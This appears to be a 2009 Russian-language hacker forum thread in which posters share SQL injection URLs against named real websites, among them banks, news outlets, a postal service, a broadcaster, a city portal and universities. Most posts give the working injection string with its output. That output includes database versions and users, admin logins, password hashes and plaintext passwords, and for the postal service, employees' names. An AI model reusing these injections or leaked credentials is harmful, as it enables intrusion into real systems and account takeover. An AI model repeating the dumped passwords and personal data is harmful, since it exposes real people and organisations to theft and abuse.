MySQL Admin data: root:*B747F2732BA6B0C2DD69A76241F18DAF52CA3777:Y
PR: 4
http://www.lp33.tv/index.php?page=content&pid=-1+union+select+1,concat_ws(0x3a,username,password, email,member_type),3,4+from+members+limit+0,1--
DB Version: 5.0.51a-community-log
DB Name: myawol
DB User:myawol@www02.myawol.com
Admin data: CaAbnK27!:B0e42b3e4f5c18529351c3b796740834
PR: 5
http://www.247.tv/index.php?men=PAGE70&mpage=newshop.php&pid=323&fromcid=-1+union+select+1,2,concat_ws(0x3a,name,passw,email )+from+members--
DB Version: 5.0.45-log
DB Name: horizonq_psalive247
DB User:horizonq_21@216.92.192.122
PR: 5
http://www.thestream.tv/watch.php?v=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,oncat_ws(0x3a,version(),user(),database( )),20,21,22,23,24,25--
DB Version: 5.0.67-community
DB Name: sempe2_vids
DB User:sempe2_vids@localhost
PR: 4
http://www.so-u.tv/playVideo.php?contestid=&id=563+union+select+1,2,3,4,5,6,7,8,9,10,11,12,con cat_ws(0x3a,username,password,email,privilege),14, 15,16,17,18,19,20+from+users+limit+2,1--
DB Version: 5.0.45
DB Name: prosperityds_sou
DB User:dbadmin@localhost
Admin data: admin:dw123js:video@so-u.tv
PR: 3
<<Новости спорта в Москве>>
http://news.mossport.ru/news_browse.asp?NewsID=64157+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='tMKSInetUser'+and+column_name+not+in+('U serID','login','passw'))--&def=photo
version: [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int
db_name: casper
user: cabi
ILYAtirtir
18.04.2009, 18:07
Центральный Кредитный Брокер
http://credit-zone.ru/banks/?list=city&val=27+union+select+1,concat_ws(0x3a,database(),us er(),version()),3,4,5,6,7--
credit:dima@localhost:4.1.22-log
http://credit-zone.ru/banks/?list=city&val=27+union+select+1,concat_ws(0x3a,user,password ,host),3,4,5,6,7+from+mysql.user--
root:0f37b8c20663dd87:localhost
root:0f37b8c20663dd87:kuperru.p8.ru
advlinkusr:25a634842c67e20b:localhost
papashi:70f35bc522afc74a:localhost
ruszoloto:10a93e0b1fc5ff49:localhost
rostur:03c31080536e2f7a:localhost
evashop:35a6c98772855ea9:localhost
abgym:1328fbca58495dd0:localhost
ru1016:5c9477846e8fe20a:localhost
msoyuz:1ef8eb0e0827f4f7:localhost
libria:27d688aa5d0b5067:localhost
kosmet:78782e4a25ab6d9c:localhost
kosmag:7458890f6fd5a6c7:localhost
sexplus:7b6ac9c3700450e3:localhost
booker:0600e0ac21807f5f:localhost
job4:758eeb2f78c70c24:localhost
rbcentre:446d92f83e20a9a6:localhost
vazclub:293d8c900db2e58f:localhost
russot:0a4688762cffcef4:localhost
buketnadom:156962f23e671ab6:localhost
dzin:15d21bfd07f90a6d:localhost
dnems:3b9573700c18fa1e:localhost
wifes:6861aa962980e103:localhost
aulibria:2674bf023832ebe1:localhost
120x80:20820c7a45f232ce:localhost
vipdomen:7c13eb121fd5eddd:localhost
zadorno:7fa128d72a588c84:localhost
esenins:2d9314cc0040a440:localhost
rss:6d3fa9ea4883cb96:localhost
zakazdomov:0fc5f17864358b31:localhost
gorko:1ffbf1527e763ca8:localhost
vkapuste:51e7f9672646d97d:localhost
dcryazan:23a8690234b1774d:localhost
firmadom:56c4b37b5f389a61:localhost
rugamer:4a010f8776e4d23a:localhost
kosmetichka:78782e4a25ab6d9c:localhost
dima:607cfba06eaba913:localhost
tvoyamarka:7c670c7c7fd6d97d:localhost
kondik:3c1dfac67da11880:localhost
sexoid:08508c4844b53a06:localhost
green-oasis:191b51e07cbc7934:localhost
vrach:25e9c4df061e8cad:localhost
lida_knr:1965de0327674786:localhost
grafdrakula:558e0e7f0dd6e145:localhost
levi-tan:7e86267744ee4105:localhost
stroibrus:5bfc7ac8160679fe:localhost
automachine:7e792ee544b5dd2d:localhost
r-stal:1197c223668d177c:localhost
loghomes:2168a40041809c6e:localhost
brevnostroi:339e2629156e950d:localhost
zakazstroi:1de17450744874f0:localhost
lasve_gas:4ba0d91c0c39ef16:localhost
konteiner:5c3d2e491ddff8b4:localhost
stroibytovka:38b5cf5b7cb808c0:localhost
stirzn:4fd0e32543a0ee26:localhost
karkasvagon:20922eba2cb6293e:localhost
konteinervdom:0250beba2f4d1d96:localhost
bytovkivagony:5962821f013a33c5:localhost
opalybkauser:0431556956247446:localhost
user_bytovochki:0748d1ac3cdcf260:localhost
user_bytbesvag:672bbc9960d68984:localhost
creditusr:46b793d659ac7d90:localhost
dima:7c13eb121fd5eddd:%
naru_media:7d8a71bb18b88e40:localhost
kos:183d59c965b1dbf6:localhost
user_9617868:491fa31d455927a6:localhost
user_cemresurs:2a9537817aee5af4:localhost
proday:695622a53ad9313c:localhost
prodaysite:4a1d45750e545a97:localhost
doska:6295939073048998:localhost
kancdocka:0a3b28ce682474ab:localhost
sanworld:25e0005a73b61f6a:80.93.58.162
sanworld:25e0005a73b61f6a:%
san:25e0005a73b61f6a:%
admin:7ce0005638d47fe4:localhost
user_context:2926805d74bba885:localhost
seo:35b987d10814c728:localhost
ckstrans_usr:059f539559940b66:localhost
climb:3d12c90045a33b75:localhost
utopzvezd:287e6fdc207f1ee6:localhost
usr_sexoid:1b1fc68814d75c83:localhost
libria_usr_new:11e37d6b519c1c36:localhost
tourusrlink:252b184465f74bfb:localhost
limoprof_usr:33efd99b1f910cf4:localhost
gorko-sladko:607cfba06eaba913:localhost
ucinti:1f106aff0dc411ea:localhost
umirlesa:2c1a40870240f4ee:localhost
gulattakgulat:304188b4040c35fe:%
<<Спецтехимпекс - Реализация конверсионной спецтехники>>
http://www.tehimpex.kiev.ua/topics.php?id=-21+union+select+table_name+from+information_schema .columns+where+column_name+like+0x70617373776f7264--+
5.0.45-log*:*tehimpex_db*:*tehimpex_root@localhost*:*port bld-freebsd6.2
table: login
log: mythical
pass: mistake
.:[melkiy]:.
18.04.2009, 23:15
Электронное издательство Директмедиа Паблишинг
http://www.directmedia.ru/d_catalogue/send2friend.phtml?id=-44+union+select+1,2,3,4,5,6--
Database Version: 4.1.22
Database name: directmedia
User name: directm@localhost
Login: qwe
Pass: 76d80224611fc919a5d54f0ff9fba446 : qwe
http://catalog-top.ru/kom.php?id=-44+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,29,21,22,23,24,25,26,27,28,29,30,31, 32,33--
Database Version: 5.0.67-community
Database name: rboard_top
User name: rboard_twisted@localhost
Информация по базе
http://manheim.ge/index.php?request=brand&lang=rus&id=36+union+select+1,2,3,4,version(),database(),us er(),@@datadir,9,10+--+
Список таблиц и строк
http://manheim.ge/index.php?request=brand&lang=rus&id=36+union+select+1,2,3,concat_ws(0x3a,table_name ,column_name),5,6,7,8,9,10+from+information_schema .columns+--+
Привилегий на чтение файлов нет, доступа к mysql.user - нет.
Нашёл админку и PHPmyAdmin. Но и там, и там basic-авторизация. Если сбручу выложу в тему про админки.
http://manheim.ge/phpmyadmin/
http://manheim.ge/admin
xakep.ru
http://www.xakep.ru/articles/links/result.asp?tosearch=1=1)+and+77=ascii(substring(db _name(),1,1))--
sobranie.info
http://www.sobranie.info/searchphoto.php?Type=2\%27&Name=%D5%EB%EE%EF%EE%ED%E8%ED&Current=-4066+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCR YPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2 A2F,User()),0x71),0x71),8,9,10,11--
Database Version: 5.0.45
Database name: zs24
User name: zs24@localhost
admin:$P$BB/1iOOHVqSxlMQh/4eVAPNnnjnXuC0:dyure@sobranie.info
mailbrush
19.04.2009, 10:13
Китайци какие-то
http://www.bareunsa.co.kr/newread.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15
barun@localhost:barun:4.1.20
http://www.digital-heritage.at/policies/article.php?id=111111'+UNION+SELECT+1,2,3,4,5,6,AE S_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),databa se(),version()),1),1),8,9,10,11,12,13,14,15,16/*
digital@localhost:digital_heritage:5.0.19-nt
http://www.digital-heritage.at/admin/ - basic авторизация =\
-=Microsoft Access=-
<<Acca Temple>>
http://accashriners.com/news.asp?ID=-4+union+select+1,name,3,4,5,6,7+from+members
Известно
table: members
column: name
:mad:
griboedovclub.ru
PR: 5
Тиц: 275
Version: 4.0.18
User: griboedov@localhost
Database: griboedov
http://www.griboedovclub.ru/club.php?page=bill&mo=12'+union+select+1,2,3,4,5,6,concat_ws(0x3a,ver sion(),user(),database()),8,9/*
<<SA Current>>
http://www.sacurrent.com/news/story.asp?id=69607+or+1=(%73%65%6C%65%63%74+top+1+ table_name+from+information_schema.tables+where+ta ble_name+not+IN+('WhatTypeID2WhatTypeID','aa_Story WhatScrapbookDups','v_BlowoutBands','What','DPWI_B annerPageSectionPosition','aa_StoryWhoScrapbookDup s','v_ClubListingDistinct','DPWI_GetAdInfoPosition s','aa_StoryWorksScrapbookDups','v_ClubReviews','v StoryBody','aa_PlaceWhatScrapbookDups','v_DiningGu ide','StoryTemp','aa_PlaceWhoScrapbookDups','v_Eve ntSummarybyType1','aa_PlaceWorksScrapbookDups','v_ mtRadioPlaylist','v_PDI_LocationWithArea','aa_Stor yPlaceScrapbookDups','AAA_DEBUG_WhyWHListingFails' ,'Announcements','Areas','BestOfAwards','BestOfBal lotDetail','BestOfBallots','BestOfBallots2','blogP osts','Blogs','Blogs_Authors','blogUsers','Cities' ,'ClassAd_Advertisements','ClassAd_Classifications ','ClassAd_MainCategories','ClassAd_MainCategories _Classifications','ClubListing','Comments','Contac ts','DP_ROLE','DP_USER','DP_UserDetails_VIEW','DPW I_AdCriteria','DPWI_ADInfo','DPWI_ADPage','DPWI_AD PageSection','DPWI_AdPosition','DPWI_AdSchedule',' DPWI_PlaceDetails'))
version:Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
database: DPSA
system_user:webuser_readonly
tableS:
DP_USER
Blogs_Authors
blogUsers
M.W.N.N.
19.04.2009, 17:52
http://br-production.fr/newsid.php?id=16+union+select+1,concat_ws(0x3a,ver sion(),database(),user()),3,4,5,6,7,8/*
version():4.0.27-max-log
database():db181593403
user():dbo181593403@212.227.127.180
..::TROYAN::..
19.04.2009, 17:53
Вот от меня немного...
ruslom.ru
http://ruslom.ru/?page=mnews&id=-777+union+select+1,concat_ws(0x3a3a3a3a,user(),dat abase(),version()),3,4,5,6,7,8,9,10,11,12,13--
ruslomit@localhost:ruslom:5.1.11-beta-log
http://ruslom.ru/?page=mnews&id=-777+union+select+1,table_name,3,4,5,6,7,8,9,10,11, 12,13+from+information_schema.tables+84,1--
тИЦ: 90
Pagerank: 6
izvoz.su
http://izvoz.su/izvoz_id.php?id=-1039+union+select+1,2,3,concat_ws(0x3a,user(),data base(),version()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18--
newsperson_tier@10.1.91.219:newsperson_izvoz:4.1.2 2-log
PR:0
Тиц:0
bombim.ru
http://bombim.ru/izvoz_id.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8--
metallica_car@212.193.228.38:metallica_izvoz:4.1.2 2
ТИц : 0
PR:2
passat-club.ru
http://www.passat-club.ru/discounts.php?id=-80+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7,8,9,10,11,12,13,14,15--
passatclub@localhost:passatclub:5.0.22
http://www.passat-club.ru/discounts.php?id=-80+union+select+1,2,3,4,table_name,6,7,8,9,10,11,1 2,13,14,15+from+information_schema.tables+limit+22 9,1--
http://www.passat-club.ru/discounts.php?id=-80+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword,salt),6,7,8,9,10,11,12,13,14,15+from+forum. user+limit+3,1--
АДМИНИСТРАТОР:84af8d52cc5407f964dd753 46999a8d6: p1A
PR:3
ТиЦ:90
www.crimea.com
http://www.crimea.com/~vika/photo.php3?id=-492+union+select+concat_ws(0x3a,version(),database (),user())--
5.0.51b-log:vika:vika@localhost
http://www.crimea.com/admin basic ((
Яндекс тИЦ 1900
M.W.N.N.
19.04.2009, 18:02
http://www.indiancinemas.com/News-39/BR+Chopra+an+end+of+an+era.html?newsid=363&linkid=39+union+select+concat_ws(0x3a,version(),da tabase(),user())+limit+1,1
version():5.0.67-COMMUNITY
database():INDIANCINEMAS_COMDB
user():INDIANCINEMAS_IN@LOCALHOST
<<Telpics"Мобильные картинки">>
http://www.telpics.ru/popups/poll.php?pollid=-17'+union+select+1,2,3,unhex(hex(concat_ws(0x2a3a2 a,version(),database(),user(),@@version_compile_os ))),5,6,7,8,9,0,1,2,3--+
4.1.13a-nt-max-log*:*1gb_supertest4*:*1gb_supertest4@10.0.1.26*:* Win32
-=admin-=
admin: wormik
adminpass: 84524ddc42eb484918c8bc4c30f847af :(
-=users=-
nick: KnOpA
pass: 020591
+limit+x,x--+
M.W.N.N.
19.04.2009, 18:34
http://www.lesel.gr/index.php?lange=en&id=10+union+select+1,2,concat_ws(0x3a,version(),da tabase(),user()),4,5,6/*
version():4.0.16-standard-log
database():lesel
user():leselgr@10.40.5.13
www.arendator.ru
http://www.arendator.ru/gmap.php?type=bc_cur&id=-152630+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,concat_ws(0x3 a,version(),database(),user()),44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58--
4.0.24:arendator:arendator@localhost
тИЦ 8700 !!!!!!!!
жаль версия 4-ая..)
<<Могилевский Байк Портал>>
http://www.wild.tu2.ru/ride.php?id=-5+union+select+1,concat_ws(0x2a3a2a,version(),data base(),user(),@@version_compile_os),3,4,5,6,7,8--+
5.0.51a-log*:*wild4*:*wild4@localhost*:*portbld-freebsd7.0
PS. Всегда хотел се байк.........
.:[melkiy]:.
19.04.2009, 19:23
Аренда ретро автомобилей
http://www.avtosssr.ru/art.php?id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.67
Database name: b31307_s
User name: u31307@78.108.84.11
http://www.autotime.ru/special/mercedes-benz/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 5.0.67-log
Database name: u52132_mercedes
User name: u52132@10.10.223.215
Login: sanek
Pass:2a08b19916bc16f5
M.W.N.N.
19.04.2009, 19:49
<<МЖД>>
http://www.mtz.mn/achaa/index.php?moduls=203&id=11+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user())/*
version():5.0.27
database():mtzAKA
user():mtzAKA@localhost
http://www.mtz.mn/achaa/index.php?moduls=203&id=11+union+select+1,2,3,4,5,concat_ws(0x3a,table_ name,column_name)+from+information_schema.columns/*
http://www.mtz.mn/achaa/index.php?moduls=203&id=11+union+select+1,2,3,4,5,concat_ws(0x3a,id,use r,password,email)+from+login/*
133:m_alba:mtzaka:m@mtz.mn
<<Сказки, рассказанные агентами Скалли и Малдер>>
http://www.snapetales.com/index.php?id=15&x_id=-34+union+select+1,concat_ws(0x2a3a2a,version(),dat abase(),user(),@@version_compile_os),3,4,5--+
4.1.14-standard*:*bluebirds_base*:*bluebirds_base@localho st*:*unknown-freebsd5.3
.:[melkiy]:.
19.04.2009, 21:42
http://keri.ru/main.php?inc=8&id=-1+union+select+1,2,3,4--
Database Version: 5.1.26-rc-percona-log
Database name: nasca_keri
User name: nasca_keri@localhost
http://www.stom2.ru/service.php?id=-1+union+select+1,2,3,4,5--
Database Version: 4.1.22-log
Database name: stom2ru2_site
User name: stom2ru2_stom2@localhost
ILYAtirtir
19.04.2009, 23:17
Федеральное Государственное Унитарное Предприятие "Российская Телевизионная и Радиовещательная Сеть"
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+@@version)
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6001: Service Pack 1)
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+system_user)
Conversion failed when converting the nvarchar value 'frontcontent' to data type int.
Проверил все таблы
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+table_name+from+information _schema.tables+where+table_name
+not+in+('GROUP_MEMBERSHIP','GROUP_RIGHTS','CONTEN T_37','SITE','SYSTEM_VARS','USER_RIGHTS','CONTENT_ TYPE','CON
TENT_TYPE','CONTENT_10','test1','PAGE','SITE_LANG' ,'TEMPLATE','CONTENT_68','ATTRIBUTE_GROUP','CONTEN T','CONTEN
T_49','CONTENT_TYPE_LINK','CONTENT_ATTRIBUTE','CON TENT_LINK','CONTENT_DATA','CONTENT_11','CONTAINER' ,'FORMAT',
'CONTENT_4','CONTENT_TYPE_GROUP','CONTENT_47','CON TENT_12','CONTENT_57','ROLE','USER_ROLE','CONTENT_ 42','CONTE
NT_71','GROUP_ROLE','ROLE_RIGHTS','SITE_SECTIONS', 'VIEWS','CONTENT_54','VIEW_CONTENT_TYPE','CONTENT_ 56','CONTE
NT_59','CONTENT_48','dtproperties','UNIT','CONTENT _13','CONTENT_44','CONTENT_73','CONTENT_65','CONTE NT_16','CO
NTENT_38','UNIT_SETTING','CONTENT_51','CONTENT_43' ,'CONTENT_52','CONTENT_2','CONTENT_55','CONTENT_46 ','CONTENT
_3','CONTENT_67','CONTENT_19','CONTENT_39','CONTEN T_24','CONTENT_60','CONTENT_14','CONTENT_41','CONT ENT_20','C
ONTENT_45','CONTENT_15','CONTENT_63','CONTENT_5',' CONTENT_23','CONTENT_69','CONTENT_50','CONTENT_58' ,'CONTENT_
6','CONTENT_70','CONTENT_61','CONTENT_40','CONTENT _7','CONTENT_25','CONTENT_53','CONTENT_62','CONTEN T_66','CON
TENT_8','CONTENT_36','ATTRIBUTE_TYPE','CONTENT_72' ,'CONTAINER_TYPE','CONTENT_17','CONTENT_STATUS','D B_VERSION'
,'LANGUAGE','OBJECT','SYSTEM_VARS_GROUP','CONTENT_ 9','USERS','USER_GROUP','BACKEND_SECTION','CONTENT _64'))
Понравилась только users
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+column_name+from+informatio n_schema.columns+where+table_name='users'+and+colu mn_name+like+'%login%')
Conversion failed when converting the nvarchar value 'login' to data type int.
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+column_name+from+informatio n_schema.columns+where+table_name='users'+and+colu mn_name+like+'%pass%')
Conversion failed when converting the nvarchar value 'password' to data type int.
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+login+from+users)
fc_admin
http://www.rtrs.ru/news.asp?y=2008&m=4+or+1=(select+top+1+password+from+users+where+l ogin='fc_admin')
frontier
В итоге вот все юзеры:
fc_admin:frontier
rtrs-editor:VMc2r7k
dmitry:karakyli
ivelum_KVP:D7KAK8I
ivelum_LPP:0XEzzv
BolotovaE:HarryPotter
ivelum_YME:moscow5
ivelum_mcsim:M2CRqk3X
rtrs-Olga:HttfR76m0b
Val:
Sob:qwertyui
От чего юзеры незнаю,т.к. нашел только форум и webmail на сайте.
.:[melkiy]:.
20.04.2009, 00:39
http://www.selvaelettrica.com/release_detail.php?id=-14+union+select+1,2,3,4,5,6,7--
Database Version: 4.1.24-standard-log
Database name: Sql78767_1
User name: Sql78767@62.149.141.75
http://melbourne.wireless.org.au/news?id=-1+union+select+1,2,3,4,5--
Database Version: 5.0.45
Database name: melbwireless
User name: melbwireless@localhost
Вытаскивать из phpbb_users
Login: admin
Pass: 72962abe4c51edd08b7a1c299a327994 : ???
Админка:
http://melbourne.wireless.org.au/admin/
ph1l1ster
20.04.2009, 14:34
bankofasia.com.np
Database Version: 4.1.22
Database name: bankofasiadb
User name: bankofasiausr@localhost
http://www.bankofasia.com.np/news-events/newsDetails.php?id=-16+union+Select+1,2,3,concat(username,0x3a,passwor d),5,6,7+from+login
bankofthejames.com
Database Version: 5.0.75
Database name: bankofthejames
User name: botjWeb1@205.178.145.65
http://www.bankofthejames.com/news.php?id=-29+union+Select+1,2,3,4,5,6,7,concat(username,0x3a ,password),9,0,1,2+from+cms_users
greenroofs.com
Database Version: 4.0.27-standard
Database name: db207579874
User name: dbo207579874@localhost
http://www.greenroofs.com/projects/pview.php?id=-663+union+select+1,concat(user_login,0x3a,user_pas s),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+w p_users
rbeurope.org
Database Version: 5.0.70
Database name: bazaerb7
User name: bazaerb7@localhost
http://www.rbeurope.org/afiseaza.php?id=-32+union+select+1,2,3,concat(email,0x3a,password), 5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from +users+limit+1,1
rsc.ca
SQL - http://www.rsc.ca/index.php?page=president&lang_id=-1+UNION+SELECT+1,2,3,4,5+--+
Инклуд(3 символа=\ варианта нет) в 3 поле и вывод во 2...
http://www.rsc.ca/index.php?page=president&lang_id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database(), version()),3,4,5+--+
rsc@localhost:rsc:4.0.27
M.W.N.N.
20.04.2009, 15:54
http://oyuniitulga.mn/index.php?com=news&catid=1&newsid=24+union+select+1,2,3,4,concat_ws(0x3a,vers ion(),database(),user()),6,7,8,9,10+limit+1,1
version():5.0.67.d7-ourdelta-log
database():dbotulga
user():dbotulga@72.167.232.53
BlackPanther
20.04.2009, 19:50
site: (http://www.blackknight.ca)
SQL -
http://www.blackknight.ca
/products.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27--
dbm.blackknight.ca@216.251.35.193 : website_en_blackknight_ca : 4.0.27-standard
http://www.blackknight.ca/products.php?id=-200+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32 ),user(),database(),%20version()),7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Admin (table : user)
admin:4dm1n
http://www.blackknight.ca/products.php?id=-200+union+select+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32 ),user(),database(),%20version()),concat(login,0x3 a,passwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27+from+users--
http://www.ssmu.edu.ge уязвим для sql-injection
http://www.ssmu.edu.ge/t.php?lang=eng&id=5%27+and+0+union+select+1,2,3,4,5,concat_ws(0x3 a,user,password),7,8,9+from+user+limit+0,1+--+
Список пользователей и их паролей.
Версия БД: 4.1.22-standard-log
Имя БД: ssmuedug_ssmu
Пользователь БД: ssmuedug_ssmu@localhost
Доступа к mysql.user нет. Прав на чтения файлов нет. information_schema нет( в связи с версией БД)
http://www.wiesbaden.de/aktuelles/rathausnachrichten/display.php?presse_id=-14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,name),4,5,6,7+from+users/*
ad-neWs.wixwiesbad
http://www.wiesbaden.de/aktuelles/rathausnachrichten/display.php?presse_id=-14702/**/UNION/**/SELECT/**/1,2,CONCAT(password,0x78,user),4,5,6,7+from+mysql. user/*
0b796e382db94bb6xroot
Database Version: 4.0.24
Database name: wiesbaden
User name: wiesbaden@localhost
и file_priv=Y
-m0rgan-
21.04.2009, 01:54
http://old.hfm-detmold.de/eti/readnews.php?id=-1+union+all+select+0,1,concat(user_id,0x3a,usernam e,0x3a,user_password),3,4,5,6+from+phpbb_users+lim it+1,1--
Узнал через сайт пасс админа форума :)
ид/юзер/пасс:
2:matthias:acbb7f96c230e9549ed3f8b7b191e519
Сам форум нахадится по урлу:
http://old.hfm-detmold.de/eti/phpBB2/
---------------------------
The End!
ILYAtirtir
21.04.2009, 04:39
Почта Санкт-Петербурга и Ленинградской области
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(concat_ws(0x3a,database(),user(),version()), 0x71),0x71),null,null,null,null,null,null,null,nul l,null,null,null,null,null
<!--<h1>spbpost_db:spbpost@localhost:5.1.30</h1>-->
Очень хитрожопая скуля,ели добился вывода,выводит закрытую в комментарий поэтому смотреть в исходник страницы
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(table_name,0x71),0x71),null,null,null,null,n ull,null,null,null,null,null,null,null,null+from+i nformation_schema.tables+where+table_name+like+'%u ser%'+limit+1,1
users
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(column_name,0x71),0x71),null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name='users '+limit+x,1
username
password
fullname
http://www.spbpost.ru/index.php?page_id=-167+union+select+null,null,null,aes_decrypt(aes_en crypt(concat_ws(0x3a,fullname,username,password),0 x71),0x71),null,null,null,null,null,null,null,null ,null,null,null,null,null+from+users
и через лимит:
УФПС - ВАСИЛЬЕВ Е. И.:eivasilev:5971581a61e98b89
УФПС - Верендякин Д. А.:daverendyakin:249619d82c53899e
УФПС - Денисенко А. И.:aidenisenko:4de93a382c1cefbd
УФПС - Казимирчак Н. Б.:nbkazimirchak:4133e8c4145182ea
УФПС - Квашко Н. В.:nvkvashko:56c61a2e1f8fcf6d:
УФПС - Кушнирова Д. К.:dkkushnirova:0cb70d5b6ee6a28d:
УФПС - Кушниров К. Д.:kdkushnirov:60073dec39882935:
УФПС - НОВИКОВА О. В.:ovnovikova:5ed106ab23566a7d
УФПС - СЕМЁНОВ С. А.:sasemenov:31228363100e514f
УФПС - СТЁПИН Е. Г.:egstepin:19bf3d905e058879
УФПС - ФИЛАНТ Ю. Н.:yunfilant:188a1ea044b9e97c:
УФПС - ХИБЛИНА Д. О.:dohiblina:7627ea600ca34984:
Моск - Белан А. В.:avbelan:56c61a2e1f8fcf6d
Моск - Зайцев В. Б.:vbzaicev:1558f95336ddc01a:
Моск - Зосимов А.А.:aazosimov:0cccf40a49afde1d
Московский - Колыхалов К.Г:kgkolihalov:48c0557a3364c17f:
Моск - Пахомов А.Е.:aepahomov:42b5c9c41cdde822:
Моск - Рыжов А.Ю.:ayurijov:42b5c9c41cdde822:
Петрогр - Захаров С.В.:svzaharov:74a467fd5f50ba32
Петрогр - Пантюхов Л.В.:lvpantyuhov:249619d82c53899e:
Петрогр - Гегелева О.Д.:odgegeleva:1b1bce234ccb7977:
Петрогр - Патрин С.В.:svpatrin:42b5c9c41cdde822:
Петрогр - Андреев Д.М.:dmandreev:42b5c9c41cdde822
Петрогр - Чебыкин Д.С.:dschebikin:360039a131e12ba4:
Красног - Стрекалов Е.С.:esstrekalov:74ab9fc96d996910:
Красног - Андреева О.Ю.:oyuandreeva:31228363100e514f:
Красног - Сапрыкн С.Г.:sgsaprikin:42b5c9c41cdde822:
Красног - Иванов А.П.:apivanov:42b5c9c41cdde822
Красног - Ковалёв И.В.:ivkovalev:42b5c9c41cdde822:
Красног - Власов А.В.:avvlasov:3945ee27485d1be7:
Красног - Бушкевич В.А:vabushkevich:5d4e81cd6a5cee2d:
Красног - Буланов Ю.В.:yuvbulanov:42b5c9c41cdde822:
Красног - Петров И.М.:impetrov:5419209c7109682d:
Краснос - Курдюмов В. О.:vokurdyumov:3c53f6f0259384e7:
Краснос - Филатов Е. Н.:enfilatov:10e71cf53618b80e:
Пушк - Войтов А.Г.:agvoitov:69e56291380af837:
Пушк - Королев К.А.:kakorolev:36e38078653714a2
Пушк - Васильев С.А.:savasilev:459d78f677e83e0e
Пушк - Бондарчук Г.С.:gsbondarchuk:49af13841472f1c9:
Сестрор - Выжлов А. Н.:anvijlov:7f11c3ed3c0215bc:
СПБПочт - Александрова А.Н.:analexandrova:343f43ab46a63bb3
СПБПочт - Байкова Г.Н.:gnbaykova:3841a56150fb0ffe
СПБПочт - Шелудяева Ю.А.:yuasheludyaeva:14e97246581da732:
СПБПочт - Макаров Д.В.:dvmakarov:00c36ac01f7eb0e4
СПБПочт - Лескович В.В.:vvleskovich:25bcc4d8285a70e6
СПБПочт - Сонина Л.И.:lisonina:1ebef14a0d5b88fa:
СПБПочт - Сергеев А.А.:aasergeev:440f30047bdce88f:
СПБПочт - Бакаева С.С.:ssbakaeva:5792afc75549b813:
СПБПочт - Семенова С.И.:sisemenova:05a25cd57ac0a70f:
СПБПочт - Крушкина О.И.:oikrushkina:37fda15d52021b47:
Инна Гайда:inna:best:
УФПС - Балалайкин А. А.:aabalalaykin:21ddb5210ad35254:
УФПС - РАСТЕГАЕВ Д. В.:dvrastegaev:68a4d8e470aad708:
Моск - Цвирко И.Н:incvirko:418d2e19518fd5a1:
Петрогр - Белов А.А.:aabelov:10b42b7c62952d6b:
Красног - Коренев К.А:kakorenev:56ef67c845d53402:
Краснос - Веселовский Д. А.:daveselovskiy:6450bf303fbef463:
Пушк - Скирда С.А.:saskirda:08803541792dd5a5:
Сестр - Заграничный Ю. Е.:yuezagranichiy:2981663432c7d6e8:
СПБПочт - Рыбак Н.В.:nvribak:5be14dc352d5cccb:
Андрей Гурский:andi:santitimes:
админка:http://spbpost.ru/admin/
Ещё одна слепая скуля на хакере =)
http://xakep.ru/common/vote3/vote_results.asp?site=SVT5'+and+1=1--
----добавка---
http://xakep.ru/common/vote3/vote_results.asp?site=SVT5'+and+77=ascii(substring (@@version,1,1))--
